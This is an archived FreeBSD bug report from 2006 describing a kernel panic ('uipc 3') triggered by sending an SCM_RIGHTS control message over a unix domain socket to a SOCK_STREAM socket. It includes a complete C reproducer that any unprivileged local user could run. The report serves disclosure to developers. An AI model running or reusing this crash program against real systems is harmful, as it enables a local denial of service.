From owner-freebsd-bugs@FreeBSD.ORG Mon Feb 27 21:20:22 2006 Return-Path: X-Original-To: freebsd-bugs@hub.freebsd.org Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8C09016A420 for ; Mon, 27 Feb 2006 21:20:22 +0000 (GMT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9AFB843D68 for ; Mon, 27 Feb 2006 21:20:11 +0000 (GMT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.13.4/8.13.4) with ESMTP id k1RLK34D099744 for ; Mon, 27 Feb 2006 21:20:03 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.13.4/8.13.4/Submit) id k1RLK2OM099739; Mon, 27 Feb 2006 21:20:02 GMT (envelope-from gnats) Resent-Date: Mon, 27 Feb 2006 21:20:02 GMT Resent-Message-Id: <200602272120.k1RLK2OM099739@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Christian Biere Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B601D16A420 for ; Mon, 27 Feb 2006 21:14:11 +0000 (GMT) (envelope-from christianbiere@gmx.de) Received: from mail.gmx.net (mail.gmx.de [213.165.64.20]) by mx1.FreeBSD.org (Postfix) with SMTP id B7B3A43D49 for ; Mon, 27 Feb 2006 21:14:10 +0000 (GMT) (envelope-from christianbiere@gmx.de) Received: (qmail invoked by alias); 27 Feb 2006 21:14:08 -0000 Received: from reverse-82-141-49-115.dialin.kamp-dsl.de (EHLO localhost) [82.141.49.115] by mail.gmx.net (mp017) with SMTP; 27 Feb 2006 22:14:08 +0100 Message-Id: <20060227211447.GA5140@cyclonus> Date: Mon, 27 Feb 2006 22:14:47 +0100 From: Christian Biere To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Cc: 
Subject: kern/93914: panic: uipc 3 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 27 Feb 2006 21:20:22 -0000 >Number: 93914 >Category: kern >Synopsis: panic: uipc 3 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Feb 27 21:20:02 GMT 2006 >Closed-Date: >Last-Modified: >Originator: Christian Biere >Release: FreeBSD 6.0-RELEASE-p4 i386 >Organization: >Environment: System: FreeBSD vs04 6.0-RELEASE-p4 FreeBSD 6.0-RELEASE-p4 #0: Thu Feb 9 15:02:18 CET 2006 jonsonn@elaine.jbhosting.de:/usr/obj/usr/src/sys/GENERIC i386 >Description: By sending a datagram with a control message over a unix domain socket to a unix domain socket of type SOCK_STREAM, it is possible to cause a kernel panic. In the reproducer below, the sending socket is itself created as SOCK_STREAM and is never connected, and the control message is a single SCM_RIGHTS descriptor handed to sendmsg() together with an explicit destination address. Nothing in the reproducer requires elevated privileges, so presumably any local user who can address the target socket path can trigger the panic (a local denial of service). >How-To-Repeat: $ cat > uipc3.c < #include #include #include #include #include #include #include #include #include #include #include #include #define ARRAY_LEN(x) (sizeof (x) / sizeof (x)[0]) static int set_socket_address(struct sockaddr_un *sun, const char *path) { static const struct sockaddr_un zero_sun; assert(sun); assert(path); *sun = zero_sun; if (strlen(path) >= sizeof sun->sun_path) { fprintf(stderr, "sockpath is too long\n"); return -1; } strncpy(sun->sun_path, path, sizeof sun->sun_path); sun->sun_len = SUN_LEN(sun); return 0; } static int create_new_socket(int stype) { int fd; fd = socket(PF_LOCAL, stype, 0); if (-1 == fd) { perror("socket(PF_LOCAL, ..., 0)"); return -1; } return fd; } static int send_msg(const int fd, const char * const dst_path, const struct msghdr * const msg_ptr) { struct msghdr msg; struct sockaddr_un sun; assert(-1 != fd); assert(dst_path); assert(msg_ptr); if (set_socket_address(&sun, dst_path)) return -1; msg = *msg_ptr; msg.msg_name = &sun; msg.msg_namelen = sizeof 
sun; if ((ssize_t) -1 == sendmsg(fd, &msg, 0)) { perror("sendmsg()"); return -1; } return 0; } static int send_descriptors(const int fd, const char * const dst_path, const int * const fd_array, const size_t num_fds) { static const struct cmsghdr zero_cmsg; static const struct msghdr zero_msg; static struct iovec iov[1]; struct msghdr msg; struct cmsghdr *cmsg; size_t data_size; ssize_t ret; assert(-1 != fd); assert(dst_path); assert(fd_array); data_size = num_fds * sizeof fd_array[0]; cmsg = malloc(CMSG_SPACE(data_size)); if (!cmsg) { perror("malloc()"); return -1; } *cmsg = zero_cmsg; cmsg->cmsg_len = CMSG_LEN(data_size); cmsg->cmsg_level = SOL_SOCKET; cmsg->cmsg_type = SCM_RIGHTS; memcpy((char *) cmsg + CMSG_LEN(0), fd_array, data_size); msg = zero_msg; msg.msg_iov = iov; msg.msg_iovlen = ARRAY_LEN(iov); msg.msg_control = cmsg; msg.msg_controllen = CMSG_LEN(data_size); ret = send_msg(fd, dst_path, &msg); free(cmsg); return ret; } void usage(void) { printf("uipc3 PATH\n"); exit(EXIT_FAILURE); } int main(int argc, char *argv[]) { int s; if (argc != 2) usage(); s = create_new_socket(SOCK_STREAM); if (-1 == s) exit(EXIT_FAILURE); { int fd; fd = STDOUT_FILENO; send_descriptors(s, argv[1], &fd, 1); } return 0; } /* vi: set ai et ts=2 sts=2 sw=2 cindent: */ EOF >Fix: >Release-Note: >Audit-Trail: >Unformatted: